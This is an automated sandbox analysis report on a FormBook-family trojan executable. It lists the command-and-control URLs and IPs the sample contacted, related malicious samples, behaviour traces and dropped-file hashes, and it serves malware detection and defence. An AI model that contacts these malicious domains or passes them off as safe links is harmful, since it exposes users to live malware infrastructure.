                                                      http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.70kdd.top/klhq/?lH_L4=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.questmatch.pro/z3ox/?lH_L4=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhVmfI//tpSvw7xSsa4vbhkQtFrYKlL+/JsA82eJgn+fnUtQ==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.acond-22-mvr.click/w9z4/false
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.llljjjiii.shop/rsvy/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.questmatch.pro/z3ox/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.smartcongress.net/11t3/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gogawithme.live/6gtt/?lH_L4=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rtpterbaruwaktu3.xyz/7yx4/?005PE=aNcLxhD894SLKl&lH_L4=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ampsamkok88.shop/huvt/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.llljjjiii.shop/rsvy/?lH_L4=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mrpokrovskii.pro/2pji/?005PE=aNcLxhD894SLKl&lH_L4=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gogawithme.live/6gtt/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.acond-22-mvr.click/w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==false
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.ytsd88.top/egqi/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ytsd88.top/egqi/?lH_L4=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ampsamkok88.shop/huvt/?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.54248711.xyz/jm2l/?lH_L4=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyh9BQr7AsY9ps2ywsUHN31DffyA3sdKxmASYgpvofv0k0Sg==&005PE=aNcLxhD894SLKlfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.canadavinreport.site/cvhb/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.54248711.xyz/jm2l/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.matteicapital.online/hyyd/false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHxpcaui.exe, 00000008.00000002.4470482798.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003D2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.mgm.gov.tr/?il=manisaW3MzrFzSF0.exefalse
                                                        		high
                                                        https://duckduckgo.com/chrome_newtabpcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dts.gnpge.compDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.questmatch.propDqSqZXvqQcT.exe, 0000000A.00000002.4469698131.0000000004CBC000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.bt.cn/?from=404pcaui.exe, 00000008.00000002.4468773018.0000000005BDE000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.00000000033BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.trtworld.com/#frmActiveBrowsersW3MzrFzSF0.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ac.ecosia.org/autocomplete?q=pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.compcaui.exe, 00000008.00000002.4468773018.0000000005728000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000002F08000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.matteicapital.online/px.js?ch=2pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.matteicapital.online/px.js?ch=1pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmbW3MzrFzSF0.exefalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameW3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  109.70.26.37
                                                                                  		www.mrpokrovskii.proRussian Federation
                                                                                  		48287RU-CENTERRUfalse
                                                                                  209.74.77.109
                                                                                  		www.gogawithme.liveUnited States
                                                                                  		31744MULTIBAND-NEWHOPEUSfalse
                                                                                  146.88.233.115
                                                                                  		smartcongress.netFrance
                                                                                  		53589PLANETHOSTER-8CAfalse
                                                                                  8.210.114.150
                                                                                  		www.llljjjiii.shopSingapore
                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                  199.59.243.227
                                                                                  		www.acond-22-mvr.clickUnited States
                                                                                  		395082BODIS-NJUSfalse
                                                                                  208.91.197.27
                                                                                  		www.matteicapital.onlineVirgin Islands (BRITISH)
                                                                                  		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                  38.47.232.124
                                                                                  		70kdd.topUnited States
                                                                                  		174COGENT-174USfalse
                                                                                  161.97.142.144
                                                                                  		www.54248711.xyzUnited States
                                                                                  		51167CONTABODEtrue
                                                                                  103.21.221.87
                                                                                  		rtpterbaruwaktu3.xyzunknown
                                                                                  		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                  172.67.138.37
                                                                                  		www.questmatch.proUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  47.76.213.197
                                                                                  		www.ytsd88.topUnited States
                                                                                  		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                  185.27.134.206
                                                                                  		www.canadavinreport.siteUnited Kingdom
                                                                                  		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                                  3.33.130.190
                                                                                  		ampsamkok88.shopUnited States
                                                                                  		8987AMAZONEXPANSIONGBfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1563494
                                                                                  Start date and time:2024-11-27 01:24:02 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 48s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:11
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:W3MzrFzSF0.exe
                                                                                  renamed because original name is a hash value
                                                                                  Original Sample Name:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@11/7@16/13
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 94%
                                                                                  • Number of executed functions: 119
                                                                                  • Number of non-executed functions: 276
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  19:24:48API Interceptor4x Sleep call for process: W3MzrFzSF0.exe modified
                                                                                  19:24:51API Interceptor14x Sleep call for process: powershell.exe modified
                                                                                  19:25:42API Interceptor10506637x Sleep call for process: pcaui.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  109.70.26.37Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • www.mrpokrovskii.pro/i6b4/
                                                                                  Cmbwwkcevcglau.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • www.xn--d1acnfnmta.xn--p1ai/pn4e/?PVWk=f3HgyfoZyN&ya3hZ6=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==
                                                                                  Uevsumfxudvvsf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • www.xn--d1acnfnmta.xn--p1ai/pn4e/
                                                                                  SecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.art-world.gallery/d82s/?10f=JpK121UpvTpc63rRp+gDJCCdgOsyWOtnd1+5GwkwMtQXrqOXZW8giVHgVA/EVEtRUGaZBcKLcc+iDZn9KexNjAxwg4PMjxbaWQ==&p5TzJe=IDSTB-Oy
                                                                                  OUTSTANDING_PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2
                                                                                  031002200411_85416475.vbsGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/8bfi/?zWlew1c=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&OgJSC=ZGqA1YcB
                                                                                  DHL.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/0oqq/?Ruu6XZ=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7/rH4CMublm7Haah6y5P+nmPrL&2bZBp4=SbhpRad-bNU
                                                                                  Payment advise.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.commandos-g.com/s44m/?JXr6I=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCAzLm0G93xdpHA==&Wu5p=T5ASsiZg7veLY
                                                                                  Receipt.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.landlotto.ru/0oqq/?yUZlwOT5=zVtcFUb2erpe1riHMkA+/+PLDdvnZOilBrPOkTLBlxKebXbCPRW4F7hHIT/4WhPpl+5XC4kkcR4ywvq/sd7/lmwCNrvm2YvKeA==&WwsB=qH_5y
                                                                                  HSBC Payment Advice _pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.commandos-g.com/s44m/?Ud=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCBrWrTq9lBVhHA==&JT=n5Pj6Rg4D3GGw
                                                                                  209.74.77.109DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.futuru.xyz/8uep/
                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.greenthub.life/r3zg/
                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.moviebuff.info/4r26/
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gogawithme.live/6gtt/
                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dailyfuns.info/n9b0/
                                                                                  146.88.233.115Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/qtfx/
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/11t3/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.54248711.xyzPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.142.144
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.142.144
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.142.144
                                                                                  www.questmatch.proQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.138.37
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.62.184
                                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 188.114.96.3
                                                                                  www.llljjjiii.shopPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 8.210.114.150
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 8.210.114.150
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 8.210.114.150
                                                                                  www.gogawithme.livePO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  www.canadavinreport.siteIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 185.27.134.206
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 185.27.134.206
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 185.27.134.206
                                                                                  Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                  • 185.27.134.206
                                                                                  www.acond-22-mvr.clickPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 199.59.243.227
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 199.59.243.227
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 199.59.243.227
                                                                                  ampsamkok88.shopPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.209.48
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.209.48
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.209.48

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 47.241.146.210
                                                                                  nabmips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 47.255.169.100
                                                                                  nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 47.245.110.86
                                                                                  splmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 147.139.4.83
                                                                                  splmips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 47.56.167.240
                                                                                  splarm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 8.219.200.13
                                                                                  fbot.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 8.211.161.8
                                                                                  https://newbuck12.oss-ap-southeast-7.aliyuncs.com/pJKrbGSI.txtGet hashmaliciousUnknownBrowse
                                                                                  • 8.213.160.91
                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 147.139.14.185
                                                                                  PLANETHOSTER-8CAPurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                  • 146.88.234.239
                                                                                  EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 199.16.129.175
                                                                                  Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                                  • 85.236.153.44
                                                                                  Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 199.16.129.175
                                                                                  https://serwer2464839.home.pl/imodzeb4Get hashmaliciousUnknownBrowse
                                                                                  • 146.88.233.222
                                                                                  MULTIBAND-NEWHOPEUSFACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.190
                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 209.74.77.109
                                                                                  packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.59
                                                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 209.74.77.108
                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.108
                                                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.108
                                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  RU-CENTERRUPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76
                                                                                  Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                                                  • 195.208.1.162
                                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                  • 109.70.26.37
                                                                                  x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 195.209.89.193
                                                                                  PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76
                                                                                  LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\W3MzrFzSF0.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\W3MzrFzSF0.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                  MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                  SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                  SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                  SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                  Malicious:true
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.379460230152629
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:fLHyIFKL3IZ2KRH9Ouggs
                                                                                  MD5:5F355422EC7EF08609CC91728781B675
                                                                                  SHA1:EC2F98559C8DCCD7B3D9454618E092E6993632DF
                                                                                  SHA-256:5531100331171995A90752EE94B34BBE5DBDD7BCCD4B8530C1D9C77404E8CC9C
                                                                                  SHA-512:90CD74FEEA54C9A8FA1EDB2B46DDCBC8640F1573064A4F2A147E1BE04AFE84F6F77ADBB98CD108A55ED21E740726911D2196B716B48C2D6EAE93BFF936BA8CBE
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                  C:\Users\user\AppData\Local\Temp\72Z53078

                                                                                  Download File
